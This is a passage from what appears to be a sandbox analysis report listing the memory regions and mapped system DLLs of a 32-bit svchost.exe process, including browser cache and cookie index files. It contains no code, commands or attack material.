= "" Region: id = 2100 start_va = 0xfe0000 end_va = 0xfe7fff entry_point = 0xfe0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe") Region: id = 2101 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2102 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2103 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2104 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2105 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2106 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2107 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2108 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2109 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2110 start_va = 0x2e0000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2111 start_va = 0x390000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2112 start_va = 0x480000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2113 start_va = 0x746f0000 end_va = 0x746f7fff entry_point = 0x746f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2114 start_va = 0x74700000 end_va = 0x7475bfff entry_point = 0x74700000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2115 start_va = 0x74760000 end_va = 0x7479efff entry_point = 0x74760000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2116 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2117 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2118 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2119 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2120 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2121 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2122 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2123 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2124 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2125 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2126 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2127 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2128 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 2129 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 2130 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2131 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2132 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2133 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2134 start_va = 0x75780000 end_va = 0x75789fff entry_point = 0x75780000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2135 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2136 start_va = 0x756e0000 end_va = 0x7577ffff entry_point = 0x756e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2137 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2138 start_va = 0x6b0000 end_va = 0x837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2139 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2140 start_va = 0x74e30000 end_va = 0x74e8ffff entry_point = 0x74e30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2141 start_va = 0x75b00000 end_va = 0x75bcbfff entry_point = 0x75b00000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2142 start_va = 0x840000 end_va = 0x9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2143 start_va = 0xff0000 end_va = 0x23effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 2144 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2145 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2146 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2147 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2148 start_va = 0x9d0000 end_va = 0xdc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 2149 start_va = 0x758d0000 end_va = 0x759ecfff entry_point = 0x758d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2150 start_va = 0x750c0000 end_va = 0x750cbfff entry_point = 0x750c0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2151 start_va = 0x75c50000 end_va = 0x76899fff entry_point = 0x75c50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2152 start_va = 0x750d0000 end_va = 0x75126fff entry_point = 0x750d0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2153 start_va = 0x74eb0000 end_va = 0x74eb4fff entry_point = 0x74eb0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2154 start_va = 0x75450000 end_va = 0x755abfff entry_point = 0x75450000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2155 start_va = 0x75350000 end_va = 0x75444fff entry_point = 0x75350000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 2156 start_va = 0x76c40000 end_va = 0x76d75fff entry_point = 0x76c40000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2157 start_va = 0x76b60000 end_va = 0x76beefff entry_point = 0x76b60000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2158 start_va = 0x74ec0000 end_va = 0x750bafff entry_point = 0x74ec0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2159 start_va = 0x748e0000 end_va = 0x748e7fff entry_point = 0x748e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2160 start_va = 0xdd0000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 2161 start_va = 0x748c0000 end_va = 0x748d5fff entry_point = 0x748c0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2162 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2163 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2164 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2165 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2166 start_va = 0x160000 end_va = 0x19bfff entry_point = 0x160000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2167 start_va = 0x74880000 end_va = 0x748bafff entry_point = 0x74880000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2168 start_va = 0x23f0000 end_va = 0x26befff entry_point = 0x23f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2169 start_va = 0x180000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2170 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2171 start_va = 0x350000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 2172 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2173 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2174 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2175 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 2176 start_va = 0xe30000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2177 start_va = 0xed0000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 2178 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 2179 start_va = 0x2730000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 2180 start_va = 0x2770000 end_va = 0x27affff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 2181 start_va = 0x27b0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 2182 start_va = 0x2830000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 2183 start_va = 0x2880000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 2184 start_va = 0x28e0000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 2185 start_va = 0x2990000 end_va = 0x29cffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 2186 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2187 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2188 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2189 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2190 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2191 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2192 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2193 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2219 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2220 start_va = 0x73b20000 end_va = 0x73cbdfff entry_point = 0x73b20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2276 start_va = 0x170000 end_va = 0x170fff entry_point = 0x170000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2277 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2278 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2279 start_va = 0x74cb0000 end_va = 0x74cbafff entry_point = 0x74cb0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2280 start_va = 0x1e0000 end_va = 0x1ebfff entry_point = 0x1e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 2281 start_va = 0x270000 end_va = 0x277fff entry_point = 0x270000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 2282 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x280000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 2283 start_va = 0x75890000 end_va = 0x758c4fff entry_point = 0x75890000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2284 start_va = 0x77240000 end_va = 0x77245fff entry_point = 0x77240000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2285 start_va = 0x29d0000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 2286 start_va = 0x74950000 end_va = 0x74993fff entry_point = 0x74950000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2287 start_va = 0x29d0000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 2288 start_va = 0x2bb0000 end_va = 0x2beffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 2289 start_va = 0x74930000 end_va = 0x7494bfff entry_point = 0x74930000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2290 start_va = 0x74920000 end_va = 0x74926fff entry_point = 0x74920000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2291 start_va = 0x290000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2292 start_va = 0xf50000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2293 start_va = 0x2a10000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 2294 start_va = 0x2a90000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 2295 start_va = 0x74900000 end_va = 0x74916fff entry_point = 0x74900000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2296 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2297 start_va = 0x2bf0000 end_va = 0x2ceffff entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 2298 start_va = 0x76bf0000 end_va = 0x76c1cfff entry_point = 0x76bf0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 2299 start_va = 0x74840000 end_va = 0x74879fff entry_point = 0x74840000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 2300 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2301 start_va = 0x510000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2302 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 2303 start_va = 0x747e0000 end_va = 0x74831fff entry_point = 0x747e0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 2304 start_va = 0x747c0000 end_va = 0x747d4fff entry_point = 0x747c0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 2305 start_va = 0x748f0000 end_va = 0x748fcfff entry_point = 0x748f0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 2306 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2307 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2308 start_va = 0x747b0000 end_va = 0x747b5fff entry_point = 0x747b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 2311 start_va = 0x747a0000 end_va = 0x747affff entry_point = 0x747a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 2312 start_va = 0x2cf0000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 2313 start_va = 0x2e50000 end_va = 0x301ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2314 start_va = 0x2cf0000 end_va = 0x2e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 2315 start_va = 0x2e40000 end_va = 0x2e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e40000" filename = "" Region: id = 2316 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2317 start_va = 0x26d0000 end_va = 0x270ffff entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 2318 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 2319 start_va = 0x74630000 end_va = 0x74635fff entry_point = 0x74630000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2320 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2321 start_va = 0x27f0000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 2322 start_va = 0x2930000 end_va = 0x296ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 2323 start_va = 0x75650000 end_va = 0x756d2fff entry_point = 0x75650000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2324 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 2325 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2326 start_va = 0x745d0000 end_va = 0x74629fff entry_point = 0x745d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 2327 start_va = 0x745c0000 end_va = 0x745cdfff entry_point = 0x745c0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2328 start_va = 0x2d80000 end_va = 0x2dbffff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 2329 start_va = 0x2e50000 end_va = 0x2e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e50000" filename = "" Region: id = 2330 start_va = 0x3010000 end_va = 0x301ffff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 2331 start_va = 0x745b0000 end_va = 0x745b7fff entry_point = 0x745b0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 2332 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 2454 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 2455 start_va = 0x74580000 end_va = 0x745a0fff entry_point = 0x74580000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2456 start_va = 0x76b10000 end_va = 0x76b54fff entry_point = 0x76b10000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2457 start_va = 0x74570000 end_va = 0x74578fff entry_point = 0x74570000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2458 start_va = 0x3020000 end_va = 0x3362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003020000" filename = "" Region: id = 2459 start_va = 0x74530000 end_va = 0x7456bfff entry_point = 0x74530000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2460 start_va = 0x2ad0000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 2461 start_va = 0x74520000 end_va = 0x74524fff entry_point = 0x74520000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 2462 start_va = 0x74510000 end_va = 0x74515fff entry_point = 0x74510000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 2463 start_va = 0x2d0000 end_va = 0x2ddfff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" 